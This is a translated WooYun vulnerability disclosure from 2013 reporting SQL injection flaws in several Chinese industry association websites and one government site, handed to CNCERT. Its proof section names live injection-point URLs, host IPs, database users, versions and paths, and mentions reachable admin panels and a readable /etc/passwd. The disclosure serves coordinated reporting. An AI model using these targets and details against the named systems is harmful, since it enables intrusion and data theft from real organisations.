
Vulnerability summary (followers: 24)

Defect ID: wooyun-2013-024648

Title: Bundled security vulnerabilities in industry associations of various provinces and cities and in one government site

Affected vendors: industry associations of various provinces and cities, and one government site

Author: 雅柏菲卡

Submitted: 2013-05-28 12:52

Fix time: 2013-07-12 12:52

Public disclosure: 2013-07-12 12:52

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: handed over to a third-party partner organisation (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2013-05-28: Details sent to the vendor; awaiting vendor handling
2013-06-01: Vendor confirmed; details disclosed to the vendor only
2013-06-11: Details disclosed to core white hats and relevant domain experts
2013-06-21: Details disclosed to regular white hats
2013-07-01: Details disclosed to intern white hats
2013-07-12: Details disclosed to the public

Brief description:

....

Detailed description:

....

Proof of vulnerability:

【Shanghai Express Delivery Industry Association】
Injection point: http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14
Target: http://www.shkdxh.com/Policiesandregulations/Policiesandregulations.php?parentid=14
Host IP: 222.73.218.56
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
DB Server: MySQL >=5
Resp. Time(avg): 671 ms
Current User: kdxhdata@localhost
Sql Version: 5.1.63-community
Current DB: kdxhdata
System User: kdxhdata@localhost
Host Name: ewww6-c5d621bc4
Installation dir: D:\Data\MySQL\MySQL Server 5.1
DB User: 'kdxhdata'@'localhost'
Data Bases: information_schema, kdxhdata

1.jpg


The admin backend is accessible; I won't bother with a screenshot. They didn't even delete the test accounts, which is embarrassing.


【Zhongshan Logistics Association】
Injection point: http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214
Target: http://www.zsla.org/issue/showDetail.do?id=44ffb2x13c20645ea7xz7fbb1359603524214
Host IP: 119.145.255.140
Web Server: nginx/1.2.0
DB Server: MySQL >=4.1
Resp. Time(avg): 97 ms
Current User: root@127.0.0.1
Sql Version: 4.1.20-standard-log
Current DB: logistics
System User: root@127.0.0.1

2.jpg


[/etc/passwd]
[/etc/group]


【Guangdong Enterprise Credit Information Network】
Injection point: http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:
Target: http://www.credit.gov.cn/private/voteResult.jsp?TOPIC=您认为广东信用建设应从哪方面着手:
Host IP: 210.76.66.106
Web Server: Apache/2.0.49 (Unix)
DB Server: Oracle
Resp. Time(avg): 2590 ms
Current User: CREDIT
Is User DBA: FALSE
Sql Version: Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Prod
Current DB: CRDT
Host Name: localhost
DB Users: SCOTT, MGMT_VIEW, WKPROXY, WKSYS, MDDATA, SYSMAN, ANONYMOUS, XDB, WK_TEST, OLAPSYS, CTXSYS, MDSYS, SI_INFORMTN_SCHEMA, ORDPLUGINS, ORDSYS, EXFSYS, WMSYS, DBSNMP, DMSYS, DIP, OUTLN, SYSTEM, SYS, CREDIT
Data Bases: SYS (repeated four times in the tool output)

3.jpg

I don't know what these tables are used for, but it looks pretty serious.


【Hubei Logistics Public Information Service Platform】
Login form injection

4.jpg


5.jpg


http://www.56ok.net/backstage/Login.aspx (admin backend)


【Dongguan Logistics Industry Association official site】
Injection point: http://www.0769wl.com/info/info_browse.php?infoID=6548
Target: http://www.0769wl.com/info/info_browse.php?infoID=6548
Host IP: 222.186.191.104
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Resp. Time(avg): 210 ms
Current User: sql0769wl@suer-ab6d8c667e
Sql Version: 5.0.51b-community-nt
Current DB: sql0769wl
System User: sql0769wl@suer-ab6d8c667e
Host Name: suer-ab6d8c667e
Installation dir: E:\PHPnow\MySQL-5.0.15b
DB User: 'sql0769wl'@'%'
Data Bases: information_schema, sql0769wl

6.jpg


Couldn't tell which one is the admin table; leaving it here.


【Nantong Banking Association】
Injection point: http://www.bankingassociationnt.com/news/Transfer.asp?newsid=8084

7.jpg


Usernames can be read out; I'll leave the detailed testing to the emergency response center.


【Hainan Certified Public Accountants Association】
Injection point: http://www.hicpa.org.cn/acctt_web/papers/zhxx.asp?cs=101

8.jpg


9.jpg

Fix proposal:

Copyright notice: please credit the source when reposting: 雅柏菲卡@WooYun


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-06-01 22:13

Vendor reply:

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-05-28 23:20 | cncert (National Internet Emergency Center) (WooYun vendor account)

    Already distributed on the 28th to several branch centers for their own verification and handling; centralized confirmation expected around the 30th.

  2. 2013-07-12 17:00 | warrioj4 (Passerby | Rank:4 Vulns:2 | 30 years focused on tools)

    Still not fixed to this day. I suggest WooYun stop publishing the URLs of sites whose SQL injection bugs go unpatched for a long time.